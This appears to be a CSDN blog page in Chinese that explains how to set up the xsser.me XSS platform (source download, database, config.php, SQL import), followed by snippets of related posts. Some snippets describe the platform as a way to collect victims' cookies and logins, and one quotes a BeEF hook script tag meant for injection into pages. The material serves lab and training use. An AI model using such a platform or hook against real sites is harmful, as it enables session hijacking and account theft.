XSS平台搭建(xsser.me)

最新推荐文章于 2025-03-12 16:31:53 发布
最新推荐文章于 2025-03-12 16:31:53 发布
阅读量5.5w 收藏 95
点赞数 16
分类专栏: 网络渗透 文章标签: php XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011781521/article/details/53895363
版权
本文档详细介绍了如何搭建和配置XSS平台xsser.me。从下载源码到安装数据库,再到修改配置文件,包括注册过程中的问题修复,以及Apache伪静态规则设置,最后进行测试以确保平台正常运行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、下载源码


地址: http://download.csdn.net/detail/u011781521/9722570


下载之后解压出来会有这么些文件




把这些文件复制到网站目录xsser中






二、配置环境



步骤: 


1、修改config.php里面的数据库连接字段,包括用户名,密码,数据库名,访问URL起始和伪静态的设置。 




1.1在phpmyadmin中新建xssplatform数据库





1.2修改访问的url起始地址为:http://localhost/xsser 也就是目录名





2、在web根目录下有一个xssplatform.sql,在phpmyadmin中创建好数据库后导入库。 


2.1phpmyadmin导入SQL



执行之后会多出9张表



最低0.47元/天 解锁文章
xss测试平台搭建
xdjxi的博客
03-16 5396
1.拉取镜像 docker pull daocloud.io/library/mysql:5.6 2.运行mysql服务,密码为root,端口号为3306 docker run --name mysqlserver -e MYSQL_ROOT_PASSWORD=root -d -i -p 3306:3306 daocloud.io/library/mysql:5.6 3. 搭建xss测试平台,拉取镜像 docker pull daxia/websafe 4. 运行容器 docker run --n..
XSS平台搭建
weixin_30474613的博客
11-11 1482
简介: 在实施xss攻击的时候,需要有一个平台用来收集攻击获得猎物(cookie,用户名密码等);xss平台就是这样一个用于收取cookie,账号等信息的平台;可以使用外网的xss平台来测试外网的网站;也可以自己在本地搭建xss平台,测试本地搭建的web网站DVWA的漏洞 试验中,使用的xss平台xsser 直接创建项目:在网站有xss的地方插入项目中的代码,执行的时候会把对应的...
XSS在线平台使用方法
最新发布
weixin_64359465的博客
03-12 293
在dvwa中的测试点执行完poc后,点击刚刚创建的项目就可查看到接收到的靶场的cookie。项目创建成功后,任意复制一条生成的poc,到dvwa靶场的xss模块执行poc。我的项目,点击创建,项目名称和描述随便填,之后点击下一步,选择需要的模板。这里选择“基础默认模块”就好,之后点击下一步,项目就创建成功了。(Pikachu、xss靶场都是同样的使用方法)进入到xss在线平台主页。
xss平台搭建
qq_45405155的博客
11-24 2344
update oc_module set code=REPLACE(code,"http://xsser.me","http://127.0.0.1/xss");
XSS平台搭建及后台使用(cookie获取)
2302_79885863的博客
04-12 2242
点击XSS后台,这就是我们收集cookie的网站,第一次进入需要初始化,如果你的数据库密码改了的就要去靶场的根目录的pkxss/inc/config.inc.php把链接数据库密码改成一致(案列靶场是这个,反正就是要找到这个配置文件)执行完之做了一个php的重定向,做完上面操作,保存完数据库之后,重新给你访问了一下这个网址,这个网址应该改成存在漏洞的网站的IP。然后我们把留言删除,刚刚我们知识测试是否存在有这个漏洞,然后我们现在想要获取cookie,需要构造代码了。这里的IP是能和虚拟机通信的,
xss平台搭建
浅笑996的博客
09-18 6495
1. xss平台搭建 l 将xss平台源码放置在网站目录下 l 进入MySQL管理界面中的phpMyAdmin界面,新建一个XSS平台的数据库 l 修改XSS源码文件目录下的config.php中的数据库连接字段,包括用户名、密码、和数据库名。 l 进入phoMyAdmin选择XSS平台数据库,导入源码包中的xssplatform.sql文件 l 执行如下SQL命令,将数据库中原有URL...
XSser.me搭建手册
06-24
XSser.me搭建手册,xsser.me是一款xss评估测试工具,可以方便的进行黑盒安全测试和进行安全培训的演示等。
利用phpstudy搭建xsser.me漏洞检测平台
2. **配合phpstudy工具搭建**:phpStudy是一个集成环境包,它集成了PHP、Apache和MySQL等服务的配置和运行环境,使得在Windows平台搭建Web开发环境变得非常简单。通过使用phpStudy,开发者可以快速搭建本地测试...
xsser测试平台
12-30
XSSer测试平台是一个专门用于检测和利用跨站脚本(Cross-Site Scripting,简称XSS)漏洞的工具。XSS是一种常见的网络安全漏洞,它允许攻击者在用户浏览器中注入恶意脚本,进而窃取用户数据、执行恶意操作或者传播...
windows下XSS平台搭建
hhiollk的博客
03-14 2174
在这里我选择用windows2003搭建,之前用linux搭建过,感觉比较浪费时间,所以这次用windows搭建,想看linux搭建的可以点击超链接查看 开始安装 首先下载好源码,Zkeys,ISAPI_Rewrite。这三个我在地下都放出了下载链接 这个是我新装的03,所以要先安装一下iis 用win+R键输入control打开控制面板,依此点开添加或删除程序-添加/删除windo...
xsser.me 源代码
06-18
xsser.me已开源,网站的源代码打包下载
xsserme.zip
10-29
下载请验证HASH:SHA256: C096B782F88599F5642B49E8A397C379980D7C296C2CF74409F21254A809F64F
XSS————1、XSS测试平台搭建
Fly_鹏程万里
05-13 5943
安装 (1)安装http server与php环境(ubuntu: sudo apt-get install apache2 php5 或 sudo apt-get install apache2 php7.0 libapache2-mod-php7.0) (2)上传所有文件至空间根目录 (3)访问目标网站 根据提示配置xss平台 在配置之前,需要赋予xss的数据存储...
搭建个人XSS平台
风羽墨客的博客
12-19 5867
我们在做XSS靶场练习的时候,可能会使用到XSS平台。我们可以使用XSS平台上的功能,换言之我们的数据也会被平台记录,出于安全性考虑,搭建个人的XSS平台有利于保护自己的数据信息。
搭建属于自己的xss平台
m0_60716947的博客
05-03 1万+
一、什么是打 cookie 简单来说就是:在你访问的页面上执行了一次JS代码,这次代码的执行后可以获取你当前已经登录某个网站的cookie ,并将该cookie 发送到攻击者指定的网站,攻击者利用你的cookie 登录你的账号。 攻击者用来接收cookie 的平台就叫做xss 平台,在网上其实有很多这种平台,但其实有的平台存在黑吃黑的现象(懂得都懂),而且有很多渗透测试任务都是保密的,不可能去第三方网站。 二、cookie 接收平台 这里推荐一个平台,BlueLotus_XSSReceiver
保姆级 | XSS Platform环境搭建
尼泊罗河伯的博客
12-07 5561
XSS Platform 平台主要是用作验证跨站脚本攻击。该平台可以部署在本地或服务器环境中。我们可以使用 XSS Platfrom 平台搭建、学习或验证各种类型的 XSS 漏洞。
xss漏洞之——XSS平台搭建
wsnbbz的博客
03-04 5081
前言 经过测试,如果发现了XSS漏洞,那么我们可以结合一些XSS工具来进行利用。常见的XSS利用工具有下面几个: 1.kali下的beef (1)kali命令行里输入beef-xss,得到一个脚本 <script src="http://127.0.0.1:3000/hook.js"></script> 将127.0.0.1改为kali的ip,之后进行植入 (2)kali...
xss平台搭建(使用xsser.me源码)
热门推荐
blrk
06-24 2万+
需要修改的地方比较多,目前已基本可用,还在学习摸索中。。。 1、将xssplatform.sql中的xsser.me/修改为实际使用的URL,如localhost:6666/xss/ 2、修改themes\default\templates\register.html中的提交按钮的源码为: 行53 修改为 3、邀请码的生成 (1)将文件source\user.p
评论 20
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值